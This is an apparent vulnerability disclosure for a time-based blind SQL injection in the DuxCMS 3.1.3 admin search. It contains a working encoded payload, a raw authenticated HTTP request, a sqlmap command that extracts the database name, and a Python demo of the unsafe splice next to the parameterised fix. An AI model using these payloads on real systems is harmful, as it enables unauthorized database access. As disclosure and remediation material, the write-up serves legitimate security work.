Time-based blind SQL injection in the DuxCMS 3.1.3 backend
Preparation:
Log in to the backend and capture the session cookie; the vulnerable page is only reachable with an authenticated session.
Vulnerability URL:
http://127.0.0.1:8093/s/article/Content/index?class_id=&keyword=
Vulnerable parameter: keyword
Payload: %27and(select*from(select+if(ascii(substr(database(),1,1))%3E97,sleep(1),0))a/**/union/**/select+1)=%27
Decoded, this is 'and(select*from(select if(ascii(substr(database(),1,1))>97,sleep(1),0))a/**/union/**/select 1)='. If the condition is true (the first character of the current database name has an ASCII value above 97), the response is delayed by about one second; otherwise it returns immediately. Varying the position and the threshold extracts the name one character at a time.
Verification with sqlmap (PoC; the request must carry a valid backend session cookie). Save the request below as 1.txt:
GET http://127.0.0.1:8093/s/article/Content/index?class_id=&keyword=%27and%28select%2Afrom%28select%2Bsleep%283%29%29a%2F%2A%2A%2Funion%2F%2A%2A%2Fselect%2B1%29%3D%27 HTTP/1.1
Host: 127.0.0.1:8093
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:126.0) Gecko/20100101 Firefox/126.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Connection: close
Cookie: PHPSESSID=jna2rl0d9ie3em6gb82s9odb3j
Upgrade-Insecure-Requests: 1
Sec-Fetch-Dest: document
Sec-Fetch-Mode: navigate
Sec-Fetch-Site: none
Sec-Fetch-User: ?1
Priority: u=1
python2 sqlmap.py -r 1.txt -p keyword --technique=T --tamper=space2comment --current-db
sqlmap retrieves the name of the current database, which confirms the vulnerability.
Vulnerability code:
Searching the code base for the injected parameter name keyword locates the call site:
App/system/admin/SystemExtendAdmin.php, line 42.
The query is vulnerable because it performs fuzzy matching with LIKE and splices $value into the pattern without filtering or escaping it.
With the input 'and(select*from(select sleep(3))a/**/union/**/select 1)=' :
As shown in the figure above, $value comes from $pageParams = request() on line 29; line 32 then runs $pageParams[$key] through urldecode(), which yields the malicious SQL fragment. No validation or escaping is applied, so the payload is concatenated directly into the query.
The SQL that is executed is: (A.title like '%'and(select*from(select sleep(3))a/**/union/**/select 1)='%')
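The flaw described above and its fix, modelled as an added Python example with SQLite (DuxCMS itself is PHP on MySQL; this is not the project's code): unsafe_like_sql() reproduces the string splice that produces the statement shown above, and safe_search() is the hardened form, with the pattern passed as a bound parameter and the LIKE wildcards escaped. The article table, its rows and the tautology input are constructed for the demonstration.

```python
import sqlite3

# Added example, not DuxCMS code. The page's flaw (PHP, MySQL) modelled with
# SQLite: a LIKE pattern built by string concatenation beside a parameterised
# one with the LIKE wildcards escaped.

PAGE_PAYLOAD = "'and(select*from(select sleep(3))a/**/union/**/select 1)='"


def unsafe_like_sql(value):
    """What the vulnerable code does: splice the decoded value straight into
    the pattern. Returns the SQL text so the splice can be inspected."""
    return f"SELECT id, title FROM article AS A WHERE (A.title LIKE '%{value}%')"


def escape_like(value, esc="\\"):
    """Neutralise %, _ and the escape character so user input matches literally."""
    return (value.replace(esc, esc + esc)
                 .replace("%", esc + "%")
                 .replace("_", esc + "_"))


def unsafe_search(conn, value):
    return conn.execute(unsafe_like_sql(value)).fetchall()


def safe_search(conn, value):
    """Hardened form: the pattern is a bound parameter, so the input is only
    ever compared as text and never reaches the SQL parser."""
    pattern = "%" + escape_like(value) + "%"
    return conn.execute(
        "SELECT id, title FROM article AS A WHERE A.title LIKE ? ESCAPE '\\'",
        (pattern,)).fetchall()


def demo_db():
    """Constructed sample table standing in for the article table."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE article (id INTEGER PRIMARY KEY, title TEXT)")
    conn.executemany("INSERT INTO article (title) VALUES (?)", [
        ("DuxCMS 3.1.3 released",),
        ("Sales up 100% this year",),
        ("Notes on under_score naming",),
    ])
    return conn


def run_demo():
    conn = demo_db()
    results = {}
    # 1. the statement the page shows, reconstructed from the splice
    results["spliced_sql"] = unsafe_like_sql(PAGE_PAYLOAD)
    # 2. the page's MySQL payload reaches the SQL parser through the unsafe
    #    query; SQLite has no sleep(), so it errors out instead of delaying
    try:
        unsafe_search(conn, PAGE_PAYLOAD)
        results["unsafe_payload_error"] = False
    except sqlite3.OperationalError:
        results["unsafe_payload_error"] = True
    # 3. a constructed SQLite-compatible injection rewrites the WHERE clause:
    #    LIKE '%' AND A.id = 1 AND A.title LIKE '%' returns exactly row 1
    injected = "' AND A.id = 1 AND A.title LIKE '"
    results["unsafe_injected_ids"] = [r[0] for r in unsafe_search(conn, injected)]
    # 4. the same inputs through the parameterised query match nothing
    results["safe_payload_rows"] = len(safe_search(conn, PAGE_PAYLOAD))
    results["safe_injected_rows"] = len(safe_search(conn, injected))
    # 5. wildcard escaping: a literal '%' in the search term still works
    results["safe_percent_rows"] = [r[0] for r in safe_search(conn, "100%")]
    return results


if __name__ == "__main__":
    for key, value in run_demo().items():
        print(f"{key}: {value}")
```

The second urldecode() in the vulnerable path does not change the fix: whatever the decoded value is, binding it as a parameter keeps it data. Escaping % and _ is a separate concern (it stops a user from turning a search into a wildcard scan) and is only correct when the query names the same ESCAPE character.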